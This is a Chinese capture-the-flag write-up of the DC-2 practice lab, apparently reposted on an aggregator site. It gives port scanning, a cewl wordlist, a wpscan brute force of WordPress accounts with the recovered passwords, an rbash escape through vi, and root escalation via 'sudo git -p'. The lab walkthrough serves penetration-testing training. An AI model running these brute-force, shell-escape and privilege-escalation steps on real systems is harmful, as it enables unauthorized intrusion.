見贤思齊
見贤思齊

DC-2靶场渗透测试实验整理

目录

一、主机存活探测

二、主机端口探测

三、漏洞探测和利用

(一)第一个flag

(二)第二个flag

1. cewl生成密码字典

2. wpscan基于字典爆破

(三)第三个flag

1. rbash逃逸

(四)第四个flag

四、提权

(一)最终flag

一、主机存活探测

        arp-scan -l 进行ARP扫描,排除其他设备IP,192.168.101.69是DC-2的IP地址。
DC-2靶场渗透测试实验整理_第1张图片

二、主机端口探测

        先用masscan快速扫描开放的端口: 
masscan --rate=100000 -p 1-65535 192.168.101.69
DC-2靶场渗透测试实验整理_第2张图片
        可以看到扫描到了80和7744两个端口
        使用nmap扫描开放端口的指纹等信息: 
nmap -T4 -sV -p80,7744 -A 192.168.101.69
DC-2靶场渗透测试实验整理_第3张图片
        可以看到扫描出几个信息:
  1. 80端口运行的http服务,版本httpd 2.4.10
  2. http上运行的web服务重定向到了http://dc-2
  3. 7744端口运行的是openssh服务,版本6.7p1
        先修改/etc/hosts文件,将192.168.101.69对应到dc-2,重新进行nmap扫描:
DC-2靶场渗透测试实验整理_第4张图片
        这次发现新的信息:http上运行了wordpress 4.7.10

三、漏洞探测和利用

        由于发现网站框架使用的wordpress,本次测试使用wpscan进行。

(一)第一个flag

        打开 http://dc-2/ ,发现第一个flag1
DC-2靶场渗透测试实验整理_第5张图片

(二)第二个flag

1. cewl生成密码字典

        根据flag1的提示,下一步需要使用cewl对网站进行信息收集生成密码字典,具体做法如下: 
cewl http://dc-2 -w wordlist.txt

2. wpscan基于字典爆破

        现在有了网站的密码字典,没有账号,所以需要使用wpscan对账号进行枚举: 
wpscan --url http://dc-2/ -e u
DC-2靶场渗透测试实验整理_第6张图片
        发现了三个账号:admin、jerry、tom,再使用wpscan对发现的3个账号分别进行密码比对
        admin账号,没有发现匹配的密码。 
wpscan --url http://dc-2 -U admin -P wordlist.txt
        jerry账号, jerry账号匹配到了密码:adipiscing 
​wpscan --url http://dc-2 -U jerry -P wordlist.txt
DC-2靶场渗透测试实验整理_第7张图片
        tom账号,tom账号匹配到了密码:parturient 
wpscan --url http://dc-2 -U tom -P wordlist.txt
DC-2靶场渗透测试实验整理_第8张图片
        
        既然已经得到了jerry和tom的密码,没说的,对wordpress熟悉的话直接登陆,如果不熟悉,还是需要进行目录探测,本文省略目录探测的步骤。
        登陆网址 http://dc-2/wp-login.php ,输入账号jerry,密码adipiscing,进入后台后浏览下网站上有的页面,很快就找到flag2
DC-2靶场渗透测试实验整理_第9张图片
DC-2靶场渗透测试实验整理_第10张图片

(三)第三个flag

        使用jerry和tom的账号密码尝试登陆ssh,这里注意,ssh的端口改成了7744。
1. jerry登陆不进ssh
2. tom可以登陆ssh,如下: 
root@kali:~# ssh [email protected] -p 7744
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
        发现flag3
tom@DC-2:~$ ls
flag3.txt  usr
        cat查看flag3.txt,遇到rbash限制,如下:
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
vi flag3.txt,内容如下:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
or old Tom is always running after

1. rbash逃逸

        为了绕过rbash限制,需要进行rbash逃逸操作,具体如下: 
vi flag3.txt
DC-2靶场渗透测试实验整理_第11张图片 
输入:set  shell=/bin/sh回车
DC-2靶场渗透测试实验整理_第12张图片
         
输入:shell回车
        逃逸成功。
        设置命令路径变量: 
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
        再用cat flag3.txt,命令执行成功:

(四)第四个flag

        flag3提示su到jerry,利用前面爆破到的密码进入jerry,如下:
可以得到jerry家目录下的flag4

DC-2靶场渗透测试实验整理_第13张图片

四、提权

(一)最终flag

        flag4提示需要用到git提权,具体操作如下: 
jerry@DC-2:~$ sudo git -p
DC-2靶场渗透测试实验整理_第14张图片 
输入!/bin/sh提权到root
cd /root
ls
DC-2靶场渗透测试实验整理_第15张图片
        获得最终flag

你可能感兴趣的:(网络安全,网络安全)

  • 【网络安全 | 渗透工具】IIS 短文件名枚举工具—shortscan安装使用教程 秋说 渗透工具web安全漏洞挖掘渗透工具
    未经许可,不得转载。文章目录shortscan安装使用Shortutil工具shortscanShortScan是一种用于在MicrosoftIIS(InternetInformationServices)Web服务器上进行短文件名枚举的工具。该工具可以帮助攻击者利用IIS的文件名处理特性,通过预测性扫描枚举服务器上的文件和目录名称。背景:在早期的Windows文件系统(如FAT和NTFS)中,每
  • 2024网安周今日开幕,亚信安全亮相30城 亚信安全官方账号 信息安全亚信安全数据安全网络安全
    2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民,网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式,让广大民众看得懂、记得住安全知识,同时还配合各地
  • 【网络安全】漏洞挖掘之会话管理缺陷 秋说 网络安全web安全漏洞挖掘会话管理
    未经许可,不得转载。文章目录正文正文目标:example.com该站点允许存在主要邮箱和次要邮箱。在尝试使用次要邮箱和密码登录时,由于账户最初是通过主邮箱创建的,无法登录。于是,我通过次要邮箱使用GoogleOAuth进行登录。令人意外的是,我成功通过GoogleOAuth登录了该账户。接着,我在两个浏览器上登录了同一个账户:Chrome浏览器使用主邮箱([email protected])和
  • Web渗透练习技巧N则(一) jintonghuoya Web搜索引擎WordPressJoomla
    简介对于我们的生活来说,web的重要性不言而喻,因为这个看起来简单的几个页面与我们的生活的联系越来越紧密,我们有更多的个人信息由其承载往来于服务器和我们的电脑之间,正因为如此,web的安全也变得越来越重要,越来越不能被我们忽视。作为一个网络安全的工作者/爱好者,研究web的安全性也变得越来越重要。那么,接下来的几篇文章,我将陆续给大家介(ban)绍(yun)一些国外的大牛的web渗透的奇技淫巧,当
  • 自学黑客(网络安全) 白袍无涯 web安全网络安全网络安全系统安全运维计算机网络
    前言:想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟
  • 五分钟了解等级保护、风险评估和安全测评三者的区别和联系? 亿林等保 安全网络安全
    等级保护基本概念:网络安全等级保护是指对国家秘密信息、法人和其他组织和公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护,对信息系统中使用的安全产品实行按等级管理,对信息系统中发生的信息安全事件等等级响应、处置。这里所指的信息系统,是指由计算机及其相关和配套的设备、设施构成的,按照一定的应用目标和规则对信息进行存储、传输、处理的系统或者网络;信息是指在信息系统中存储、
  • 一分钟了解小程序的等保测评 亿林科技网络安全 小程序
    小程序作为移动互联网应用的一种形式,其安全性和合规性受到了国家法律法规的严格要求。根据《中华人民共和国网络安全法》和《信息安全技术个人信息安全规范》等相关法律法规,小程序在开发和运营过程中需要进行等级保护测评(等保测评),以确保用户数据的安全和隐私保护。等保测评是指对信息系统进行安全等级保护的评估,包括安全技术措施和安全管理措施的评估。小程序的等保测评得分需要在70分以上,且信息系统没有高风险项才
  • 云WAF:网络安全的未来之选 亿林科技网络安全 web安全安全
    在数字化时代,网络安全面临着前所未有的挑战。云WAF(WebApplicationFirewall)作为一种创新的网络安全解决方案,正以其独特的优势引领网络安全的新潮流。云WAF(WebApplicationFirewall)作为保护Web应用安全的关键技术,正逐渐成为网络安全领域的新趋势。以下是几个主要原因:弹性扩展能力:云WAF基于云平台的资源和计算能力,可以实现动态的扩展和调整,根据实际流量
  • 【网络安全】URL解析器混淆绕过CSP实现XSS 秋说 网络安全web安全xss漏洞挖掘
    未经许可,不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能,它们通过优化网站中的图像来加快页面加载速度。例如:1、OptimizingImages|Next.js利用内置的next/image组件优化图像(nextjs.org)2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能,使用内置优化器对图像进行调整(image.nuxt.com)这些工具的目标都
  • IP查询技术:构建网络安全的坚实防线 IP地址查询 web安全tcp/ip网络
    在数字化时代,企业网络面临着复杂多变的威胁与挑战。因此,构建一个稳固的网络安全体系至关重要。而IP查询技术,作为网络安全防御体系中的一把利剑,正日益成为企业防范网络风险的重要工具。什么是IP查询技术?IP查询技术,简而言之,是通过分析特定IP地址的活动和行为,来评估其潜在的网络威胁和安全风险。这一技术不仅关注IP地址的所在位置、历史活动记录,还深入剖析其连接模式、使用频率等关键信息。通过这些数据的
  • 谭晓生解读:AI如何重塑网络安全的未来? 腾讯云开发者 搜索引擎
    导语|当前,对网络安全而言,每一次新的信息技术浪潮都蕴含着巨大机会,同时也意味着巨大的挑战。大模型的发展,是带来了更大的AI安全风险,还是将赋能提升网络安全呢?网络安全正在迎来一场重大范式转移,“AIForSecurity和SecurityForAI”正成为网络安全的主战场。今天,我们特邀了北京赛博英杰科技有限公司创始人谭晓生老师,深谙安全之道的他将为我们深入解读人工智能时代下网络安全的发展趋势。
  • 网络安全最新SARIMA季节项时间序列分析流程+python代码 2401_84301389 程序员python人工智能机器学习
    文章目录数据流程流程分割1画图2季节项和周期项的去除3平稳性检验4白噪声检验5模型拟合6模型定阶AIC/BIC准则7检查残差是否通过检验7.1若通过检验7.2若未通过检验8模型的预测9模型的评价画图均方差等总的代码参考数据数据网站:NationalAeronauticsandSpaceAdministrationGoddardInstituteforSpaceStudies主要分析的是北美陆地表面
  • Kafka【问题 03】Connection to node -1 ( IP 9092) could not be established(1) 2401_84265972 2024年程序员学习网络安全web安全面试
    还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!】93道网络安全面试题需要体系化学习资料的朋友,可以加我V获取:vip204888(备注网络安全
  • 网络安全最新网络安全-SSRF漏洞原理、攻击与防御(1),2024年最新网络安全程序员架构之路该如何继续学习 2401_84265972 程序员网络安全学习面试
    如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF
  • 什么是网络安全网状架构 (CSMA)? 网络研究观 网络研究观架构安全网络系统原则
    什么是网络安全中的威胁情报?什么是网络安全中的社会工程?什么是托管检测和响应(MDR)?什么是数字取证?什么是生物识别技术?什么是人肉搜索?什么是密文?什么是恶意软件?什么是端点检测和响应(EDR)?微信搜索关注公众号网络研究观,获取更多信息。网络安全网状架构(CSMA)是一组用于创建有效安全框架的组织原则。使用CSMA方法意味着设计一个可组合且可扩展的安全架构,具有易于扩展的接口、通用数据模式以
  • 怎样确保零信任架构在网络安全框架中的顺利整合 图幻未来 网络安全
    确保零信任架构在网络安全框架中顺利整合的方法与分析随着网络技术的飞速发展,网络安全问题日益严重,企业对于数据安全和网络防护的需求也不断提高。作为一种新型的网络安全策略,零信任架构(ZeroTrustArchitecture)受到了广泛关注。本文将探讨如何确保零信任架构在网络安全框架中顺利整合,并分析AI技术在零信任架构的应用场景。一、零信任架构概述零信任架构(ZTA)是一种以“永不信任,总是验证”
  • 【网络安全】如何预防xss 不会代码的小徐 web安全xss安全
    XSS(Cross-SiteScripting,跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本,使其在用户浏览器中执行,从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了,为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起,浏览器无法分辨它们的可信度,最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码,它们
  • “微软蓝屏”事件:网络安全问题的深刻反思 码农在写小程序 microsoftweb安全安全
    “微软蓝屏”事件:网络安全问题的深刻反思近日,由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅震惊了科技领域,更对全球IT基础设施的韧性与安全性提出了严峻考验。这次事件源于一个带有“缺陷”的软件更新,其影响范围之广、后果之严重,令人深思。面对如此大规模的系统中断,我们不得不重新审视网络安全与系统稳定性的问题,探讨如何构建更加稳固和安全的网络环境。一、软件更新流程中的风险管理和质量控制机制软
  • 怎样选择高防服务器进行租用? wanhengwangluo 网络安全运维
    在目前的互联网行业当中,线上网络业务发展的越来越迅速,同时也会受到各种各样的网络攻击,所以企业十分重视服务器的防御功能,而高防服务器就有着很高的防御能力,一般是指独立单个防御50G以上的服务器类型,可以为单个客户提供网络安全维护的服务器类型。那我们下面一起来探讨一下怎样选择高防服务器进行租用吧!企业在进行选择合适的高防服务器进行租用时,要选择合适的线路IP,线路通常分为单线、双线、多线,我们可以根
  • 防火墙部署基本方法 坚持可信 信息安全php开发语言
    防火墙部署基本方法防火墙部署是确保网络安全的重要步骤,通过合理的部署和配置防火墙,可以有效地保护网络资源,防止未经授权的访问和网络攻击。以下是防火墙部署的基本方法,包括部署步骤、配置建议和常见的部署拓扑。一、部署步骤1.需求分析步骤:评估网络结构:了解当前网络拓扑结构、流量模式和主要的网络设备。明确安全需求:确定需要保护的资源、潜在威胁以及安全目标。选择防火墙类型:根据需求选择合适的防火墙类型(硬
  • 【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析 秋说 CTFCTF网络安全web安全
    文章目录代码审计解题思路wakeup绕过preg_match绕过base64绕过GET传参方法二代码审计这段代码首先定义了一个名为Demo的类,包含了一个私有变量$file和三个魔术方法__construct()、__destruct()和__wakeup()。其中:__construce()方法用于初始化$file变量__destruce方法用于输出文件内容__wakeup()方法检查当前对象的
  • ipv4v6双栈技术_【第二十六期】IPv6系列应用篇——数据中心IPv4/IPv6双栈架构探讨... weixin_39598308 ipv4v6双栈技术
    背景2017年,工业和信息化部发布了《推进互联网协议第六版(IPv6)规模部署行动计划》的通知,从国家层面推动下一代IP技术——IPv6的普及和应用。目标到2020年末,IPv6活跃用户数超过5亿,在互联网用户中的占比超过50%,新增网络地址不再使用私有IPv4地址。这就要求从互联网应用、网络基础设施、应用基础设施和网络安全等各个维度推动IPv6的改造和建设。互联网业务的IPv6改造不会一蹴而就,
  • 如何应对网络安全威胁和攻击 DY009J 网络安全DY009J
    前言应对网络安全威胁和攻击是现代企业和组织必须面对的重要挑战。以下是一套全面的策略,旨在增强网络安全防护,及时响应并有效减轻网络攻击的影响。1.构建强大的防御体系防火墙和入侵检测系统:部署先进的防火墙和入侵检测系统(IDS),监测和阻止未经授权的网络访问。加密通信:使用SSL/TLS协议加密数据传输,保护信息不被窃听或篡改。多因素认证:实施多因素认证(MFA),增加账户安全,防止密码泄露导致的攻击
  • 2024年最全API成批分配漏洞介绍与解决方案_api 成批分配,聊聊网络安全开发的现状和思考 2401_84132544 程序员web安全网络安全
    本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有
  • webview无法加载http流量及Expo修改Android权限 小童不学前端 ReactNatviereactnativeExpoandroidhttp
    文章目录前言react-native-webview无法加载http流量报错修改http网络权限1.迁移到EASBuild2.创建android文件夹3.修改AndroidManifest.xml4.添加网络安全配置文件(可选)5.构建项目6.使用HTTPS前言在使用RN直接创建项目时,我们可以进行修改里面的一些权限,但是当我们使用Expo开发时,却发现没有android的这些文件夹,所以修改权限
  • 网络ACL详解-从原理到实战模拟 CloudJourney 网络学习
    引言在复杂多变的网络环境中,保障网络安全和数据传输的合法性、高效性至关重要。访问控制列表(AccessControlLists,简称ACL)作为网络安全的重要组成部分,广泛应用于各种网络设备中,用以控制网络流量的流向和访问权限。本文将以华为网络设备为体系,深入探讨ACL的定义、原理、内部流程、应用场景,并通过实战案例展示其配置和应用方法。一、ACL的定义与原理1.1定义访问控制列表(ACL)是一种
  • 【无标题】XSS安全防护:responseBody (输入流可重复读) 配置 syfjava RuoYi-Vue-Plus学习RuoYi-Vue-Plus
    接上文:配置XSS过滤器XXS安全防护:拦截器+注解实现校验-CSDN博客XSS(跨站脚本)攻击是一种网络安全威胁,允许攻击者注入恶意脚本到看似安全的网站。当用户浏览这些被注入恶意代码的网页时,恶意脚本会在用户的浏览器环境中执行,这可能导致多种安全问题,如窃取敏感数据、劫持用户会话等。这些攻击利用了应用程序对用户输入处理不当的问题。预防方法包括输入验证、输出编码等。https://blog.csd
  • 网络安全(黑客)自学 白帽子凯哥 web安全安全网络安全服务器网络
    一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一
  • 如何用3个月零基础入门网络安全?_网络安全零基础怎么学习 白帽黑客啊一 web安全学习安全网安入门flutter
    前言写这篇教程的初衷是很多朋友都想了解如何入门/转行网络安全,实现自己的“黑客梦”。文章的宗旨是:1.指出一些自学的误区2.提供客观可行的学习表3.推荐我认为适合小白学习的资源.大佬绕道哈!→点击获取网络安全资料·攻略←一、自学网络安全学习的误区和陷阱1.不要试图先成为一名程序员(以编程为基础的学习)再开始学习我在之前的回答中,我都一再强调不要以编程为基础再开始学习网络安全,一般来说,学习编程不但
  • 数据分析-13-时间序列异常值检测的类型及常见的检测方法 皮皮冰燃 数据分析数据分析
    参考时间序列异常值的分类及检测参考异常值数据预警分析1时间序列异常的类型时间序列异常检测是数据处理和分析的重要环节,广泛应用于量化交易、网络安全检测、自动驾驶汽车和大型工业设备日常维护等领域。在时间序列数据中,异常通常指的是与正常数据模式显著不同的数据点,可能由系统故障、错误或外部干扰引起。异常数据,也称为离群点,是指在数据集中与其他数据点明显不同的样本。这些数据点往往不符合预期的模式或行为,可能
  • java责任链模式 3213213333332132 java责任链模式村民告县长
    责任链模式,通常就是一个请求从最低级开始往上层层的请求,当在某一层满足条件时,请求将被处理,当请求到最高层仍未满足时,则请求不会被处理。 就是一个请求在这个链条的责任范围内,会被相应的处理,如果超出链条的责任范围外,请求不会被相应的处理。 下面代码模拟这样的效果: 创建一个政府抽象类,方便所有的具体政府部门继承它。 package 责任链模式; /** *
  • linux、mysql、nginx、tomcat 性能参数优化 ronin47
    一、linux 系统内核参数 /etc/sysctl.conf文件常用参数 net.core.netdev_max_backlog = 32768 #允许送到队列的数据包的最大数目 net.core.rmem_max = 8388608 #SOCKET读缓存区大小 net.core.wmem_max = 8388608 #SOCKET写缓存区大
  • php命令行界面 dcj3sjt126com PHPcli
    常用选项 php -v php -i PHP安装的有关信息 php -h 访问帮助文件 php -m 列出编译到当前PHP安装的所有模块 执行一段代码 php -r 'echo "hello, world!";' php -r 'echo "Hello, World!\n";' php -r '$ts = filemtime("
  • Filter&Session 171815164 session
    Filter HttpServletRequest requ = (HttpServletRequest) req; HttpSession session = requ.getSession(); if (session.getAttribute("admin") == null) { PrintWriter out = res.ge
  • 连接池与Spring,Hibernate结合 g21121 Hibernate
            前几篇关于Java连接池的介绍都是基于Java应用的,而我们常用的场景是与Spring和ORM框架结合,下面就利用实例学习一下这方面的配置。         1.下载相关内容:     &nb
  • [简单]mybatis判断数字类型 53873039oycg mybatis
           昨天同事反馈mybatis保存不了int类型的属性,一直报错,错误信息如下:       Caused by: java.lang.NumberFormatException: For input string: "null" at sun.mis
  • 项目启动时或者启动后ava.lang.OutOfMemoryError: PermGen space 程序员是怎么炼成的 eclipsejvmtomcatcatalina.sheclipse.ini
       在启动比较大的项目时,因为存在大量的jsp页面,所以在编译的时候会生成很多的.class文件,.class文件是都会被加载到jvm的方法区中,如果要加载的class文件很多,就会出现方法区溢出异常 java.lang.OutOfMemoryError: PermGen space.     解决办法是点击eclipse里的tomcat,在
  • 我的crm小结 aijuans crm
    各种原因吧,crm今天才完了。主要是接触了几个新技术: Struts2、poi、ibatis这几个都是以前的项目中用过的。 Jsf、tapestry是这次新接触的,都是界面层的框架,用起来也不难。思路和struts不太一样,传说比较简单方便。不过个人感觉还是struts用着顺手啊,当然springmvc也很顺手,不知道是因为习惯还是什么。jsf和tapestry应用的时候需要知道他们的标签、主
  • spring里配置使用hibernate的二级缓存几步 antonyup_2006 javaspringHibernatexmlcache
    .在spring的配置文件中 applicationContent.xml,hibernate部分加入 xml 代码 <prop key="hibernate.cache.provider_class">org.hibernate.cache.EhCacheProvider</prop> <prop key="hi
  • JAVA基础面试题 百合不是茶 抽象实现接口String类接口继承抽象类继承实体类自定义异常
    /*   * 栈(stack):主要保存基本类型(或者叫内置类型)(char、byte、short、   *int、long、 float、double、boolean)和对象的引用,数据可以共享,速度仅次于   * 寄存器(register),快于堆。堆(heap):用于存储对象。   */  &
  • 让sqlmap文件 "继承" 起来 bijian1013 javaibatissqlmap
            多个项目中使用ibatis , 和数据库表对应的 sqlmap文件(增删改查等基本语句),dao, pojo 都是由工具自动生成的, 现在将这些自动生成的文件放在一个单独的工程中,其它项目工程中通过jar包来引用 ,并通过"继承"为基础的sqlmap文件,dao,pojo 添加新的方法来满足项
  • 精通Oracle10编程SQL(13)开发触发器 bijian1013 oracle数据库plsql
    /* *开发触发器 */ --得到日期是周几 select to_char(sysdate+4,'DY','nls_date_language=AMERICAN') from dual; select to_char(sysdate,'DY','nls_date_language=AMERICAN') from dual; --建立BEFORE语句触发器 CREATE O
  • 【EhCache三】EhCache查询 bit1129 ehcache
    本文介绍EhCache查询缓存中数据,EhCache提供了类似Hibernate的查询API,可以按照给定的条件进行查询。   要对EhCache进行查询,需要在ehcache.xml中设定要查询的属性   数据准备 @Before public void setUp() { //加载EhCache配置文件 Inpu
  • CXF框架入门实例 白糖_ springWeb框架webserviceservlet
    CXF是apache旗下的开源框架,由Celtix + XFire这两门经典的框架合成,是一套非常流行的web service框架。 它提供了JAX-WS的全面支持,并且可以根据实际项目的需要,采用代码优先(Code First)或者 WSDL 优先(WSDL First)来轻松地实现 Web Services 的发布和使用,同时它能与spring进行完美结合。 在apache cxf官网提供
  • angular.equals boyitech AngularJSAngularJS APIAnguarJS 中文APIangular.equals
    angular.equals   描述: 比较两个值或者两个对象是不是 相等。还支持值的类型,正则表达式和数组的比较。   两个值或对象被认为是 相等的前提条件是以下的情况至少能满足一项: 两个值或者对象能通过=== (恒等) 的比较 两个值或者对象是同样类型,并且他们的属性都能通过angular
  • java-腾讯暑期实习生-输入一个数组A[1,2,...n],求输入B,使得数组B中的第i个数字B[i]=A[0]*A[1]*...*A[i-1]*A[i+1] bylijinnan java
    这道题的具体思路请参看 何海涛的微博:http://weibo.com/zhedahht import java.math.BigInteger; import java.util.Arrays; public class CreateBFromATencent { /** * 题目:输入一个数组A[1,2,...n],求输入B,使得数组B中的第i个数字B[i]=A
  • FastDFS 的安装和配置 修订版 Chen.H linuxfastDFS分布式文件系统
    FastDFS Home:http://code.google.com/p/fastdfs/ 1. 安装 http://code.google.com/p/fastdfs/wiki/Setup http://hi.baidu.com/leolance/blog/item/3c273327978ae55f93580703.html 安装libevent (对libevent的版本要求为1.4.
  • [强人工智能]拓扑扫描与自适应构造器 comsci 人工智能
          当我们面对一个有限拓扑网络的时候,在对已知的拓扑结构进行分析之后,发现在连通点之后,还存在若干个子网络,且这些网络的结构是未知的,数据库中并未存在这些网络的拓扑结构数据....这个时候,我们该怎么办呢?       那么,现在我们必须设计新的模块和代码包来处理上面的问题
  • oracle merge into的用法 daizj oraclesqlmerget into
    Oracle中merge into的使用 http://blog.csdn.net/yuzhic/article/details/1896878 http://blog.csdn.net/macle2010/article/details/5980965 该命令使用一条语句从一个或者多个数据源中完成对表的更新和插入数据. ORACLE 9i 中,使用此命令必须同时指定UPDATE 和INSE
  • 不适合使用Hadoop的场景 datamachine hadoop
    转自:http://dev.yesky.com/296/35381296.shtml。   Hadoop通常被认定是能够帮助你解决所有问题的唯一方案。 当人们提到“大数据”或是“数据分析”等相关问题的时候,会听到脱口而出的回答:Hadoop!  实际上Hadoop被设计和建造出来,是用来解决一系列特定问题的。对某些问题来说,Hadoop至多算是一个不好的选择,对另一些问题来说,选择Ha
  • YII findAll的用法 dcj3sjt126com yii
    看文档比较糊涂,其实挺简单的: $predictions=Prediction::model()->findAll("uid=:uid",array(":uid"=>10));   第一个参数是选择条件:”uid=10″。其中:uid是一个占位符,在后面的array(“:uid”=>10)对齐进行了赋值; 更完善的查询需要
  • vim 常用 NERDTree 快捷键 dcj3sjt126com vim
    下面给大家整理了一些vim NERDTree的常用快捷键了,这里几乎包括了所有的快捷键了,希望文章对各位会带来帮助。 切换工作台和目录 ctrl + w + h 光标 focus 左侧树形目录ctrl + w + l 光标 focus 右侧文件显示窗口ctrl + w + w 光标自动在左右侧窗口切换ctrl + w + r 移动当前窗口的布局位置 o 在已有窗口中打开文件、目录或书签,并跳
  • Java把目录下的文件打印出来 蕃薯耀 列出目录下的文件文件夹下面的文件目录下的文件
    Java把目录下的文件打印出来 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 11:02:
  • linux远程桌面----VNCServer与rdesktop hanqunfeng Desktop
    windows远程桌面到linux,需要在linux上安装vncserver,并开启vnc服务,同时需要在windows下使用vnc-viewer访问Linux。vncserver同时支持linux远程桌面到linux。   linux远程桌面到windows,需要在linux上安装rdesktop,同时开启windows的远程桌面访问。   下面分别介绍,以windo
  • guava中的join和split功能 jackyrong java
    guava库中,包含了很好的join和split的功能,例子如下: 1) 将LIST转换为使用字符串连接的字符串    List<String> names = Lists.newArrayList("John", "Jane", "Adam", "Tom");
  • Web开发技术十年发展历程 lampcy androidWeb浏览器html5
    回顾web开发技术这十年发展历程: Ajax 03年的时候我上六年级,那时候网吧刚在小县城的角落萌生。传奇,大话西游第一代网游一时风靡。我抱着试一试的心态给了网吧老板两块钱想申请个号玩玩,然后接下来的一个小时我一直在,注,册,账,号。 彼时网吧用的512k的带宽,注册的时候,填了一堆信息,提交,页面跳转,嘣,”您填写的信息有误,请重填”。然后跳转回注册页面,以此循环。我现在时常想,如果当时a
  • 架构师之mima-----------------mina的非NIO控制IOBuffer(说得比较好) nannan408 buffer
    1.前言。   如题。 2.代码。   IoService IoService是一个接口,有两种实现:IoAcceptor和IoConnector;其中IoAcceptor是针对Server端的实现,IoConnector是针对Client端的实现;IoService的职责包括: 1、监听器管理 2、IoHandler 3、IoSession
  • ORA-00054:resource busy and acquire with NOWAIT specified Everyday都不同 oraclesessionLock
    [Oracle] 今天对一个数据量很大的表进行操作时,出现如题所示的异常。此时表明数据库的事务处于“忙”的状态,而且被lock了,所以必须先关闭占用的session。   step1,查看被lock的session:   select t2.username, t2.sid, t2.serial#, t2.logon_time from v$locked_obj
  • javascript学习笔记 tntxia JavaScript
      javascript里面有6种基本类型的值:number、string、boolean、object、function和undefined。number:就是数字值,包括整数、小数、NaN、正负无穷。string:字符串类型、单双引号引起来的内容。boolean:true、false object:表示所有的javascript对象,不用多说function:我们熟悉的方法,也就是
  • Java enum的用法详解 xieke90 enum枚举
    Java中枚举实现的分析:     示例:  public static enum SEVERITY{ INFO,WARN,ERROR }     enum很像特殊的class,实际上enum声明定义的类型就是一个类。 而这些类都是类库中Enum类的子类      (java.l
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他